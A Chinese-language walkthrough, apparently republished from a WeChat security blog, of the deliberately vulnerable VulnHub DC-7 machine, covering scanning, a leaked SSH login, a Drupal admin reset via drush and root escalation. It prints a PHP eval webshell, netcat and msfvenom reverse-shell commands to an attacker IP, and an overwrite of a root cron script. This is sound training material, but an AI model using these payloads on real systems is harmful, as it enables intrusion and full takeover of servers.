【红队靶机系列】-- DC-7

admin
admin
admin
138359
文章
113
评论
2024年8月26日22:18:28评论32 views字数 2674阅读8分54秒阅读模式

阅读须知

技术文章仅供参考,此文所提供的信息仅用于学习,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

    我们继续进行红队靶场系列,vulnhub靶机中的 DC-7 。

选用工具:

VM17   官网下载kali 2023.3版  https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2023.3/靶场文件  https://download.vulnhub.com/dc/DC-7.zip

前期准备工作搞定后,我们继续。

  • 主机发现

同样使用 arp-scan

sudo arp-scan -l

1、进行常规的主机发现和信息收集。Nmap 四件套

sudo nmap -sT --min-rate 10000 -p- 192.168.182.136 -oA nmapscan/portssudo nmap -sT -sV -sC -O -p80 192.168.182.136 -oA nmapscan/detailsudo nmap -sU --top-ports 20  192.168.182.136 -oA nmapscan/udpsudo nmap --script=vuln -p80,22 192.168.182.136 -oA nmapscan/vuln

【红队靶机系列】-- DC-7

2、在详细扫描中,发现这是一个 Drupal 站

【红队靶机系列】-- DC-7

【红队靶机系列】-- DC-7

跳出靶场,盒子之外,找一下vulnhub的提示?【红队靶机系列】-- DC-7

账号密码

dc7user MdR3xOgB7#dW

登录不行

【红队靶机系列】-- DC-7

尝试ssh,登录成功了。

【红队靶机系列】-- DC-7

看到了,有一个新邮件,查看一下。

【红队靶机系列】-- DC-7

解释一下

根据邮件内容,这是一个由 Cron 作业调度程序发出的通知邮件,指示脚本 /opt/scripts/backups.sh 已成功执行并将数据库备份保存到 /home/dc7user/backups/website.sql 文件中。这封邮件是由 cron 守护进程在定时任务执行后自动发送的,该定时任务执行了 /opt/scripts/backups.sh 脚本,并成功完成了数据库备份操作。

查看一下该文件本身,权限等基本信息。

/opt/scripts/backups.sh

【红队靶机系列】-- DC-7

dc7user@dc-7:~$ cat /opt/scripts/backups.sh#!/bin/bashrm /home/dc7user/backups/*cd /var/www/html/drush sql-dump --result-file=/home/dc7user/backups/website.sqlcd ..tar -czf /home/dc7user/backups/website.tar.gz html/gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sqlgpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gzchown dc7user:dc7user /home/dc7user/backups/*rm /home/dc7user/backups/website.sqlrm /home/dc7user/backups/website.tar.gz

看文件执行权限。

dc7user@dc-7:/opt/scripts$ ls -ltotal 4-rwxrwxr-x 1 root www-data 520 Aug 29  2019 backups.sh
解释:文件的所有者(root)和所属组(www-data都有读取(r)、写入(w)和执行(x)的权限。同时,其他用户也有读取和执行的权限,但没有写入的权限。

这意味着,我们只需有www-data的用户权限,就可以在该定时任务中写入反弹shell,直接实现提权root。现在,我们需要想办法得到www-data的权限。

同时,该文件存在数据库调用命令。

drush sql-dump --result-file=/home/dc7user/backups/website.sql

【红队靶机系列】-- DC-7

cd /var/www/html/drush user-password admin --password="123456"

【红队靶机系列】-- DC-7

登录成功

【红队靶机系列】-- DC-7

没找到php的写入。记得是有这种功能点的。但没有,可以装这种功能模块。

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

【红队靶机系列】-- DC-7

【红队靶机系列】-- DC-7


安装之后,【红队靶机系列】-- DC-7

【红队靶机系列】-- DC-7

可以写个一句话,

http://192.168.182.136/index.php<?php @eval($_POST['glass']);?>

【红队靶机系列】-- DC-7

【红队靶机系列】-- DC-7

在定时任务文件中写反弹shellcd /opt/scriptsecho "nc 192.168.182.129 -e 4444 /bin/bash" > backups.sh

【红队靶机系列】-- DC-7

这毕竟是模拟的命令行,交互性可能不足,进行一下外联。

这是使用msf生成的。

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.182.129 lport=4444 R
mkfifo /tmp/zkemj; nc 192.168.182.136 4444 0</tmp/zkemj | /bin/sh >/tmp/zkemj 2>&1rm /tmp/zkemj

【红队靶机系列】-- DC-7

提升一下观赏性,

python -c "import pty;pty.spawn('/bin/bash')"export TERM=xterm

继续写反弹shell

【红队靶机系列】-- DC-7

成功写入。现在只需等待即可。

总结一下。先通过社工,找到了一个账号密码,进行尝试登录。验证后,发现是用于ssh登录。登录后,存在有一个显眼的邮件提示,查看邮件,发现存在有定时任务,并且有root权限。看写入该文件需要什么权限,发现现登录的用户无写权限,但是存在www-data有权限,尝试获取www-data权限,后发现存在drush 命令,可以直接改web的密码,进入后台后,找可写入php 的点,没有则下载模块,反弹shell,修改定时任务文件,成功拿到最高权限。

原文始发于微信公众号(Glass的网安笔记):【红队靶机系列】-- DC-7

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月26日22:18:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【红队靶机系列】-- DC-7https://cn-sec.com/archives/3099159.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息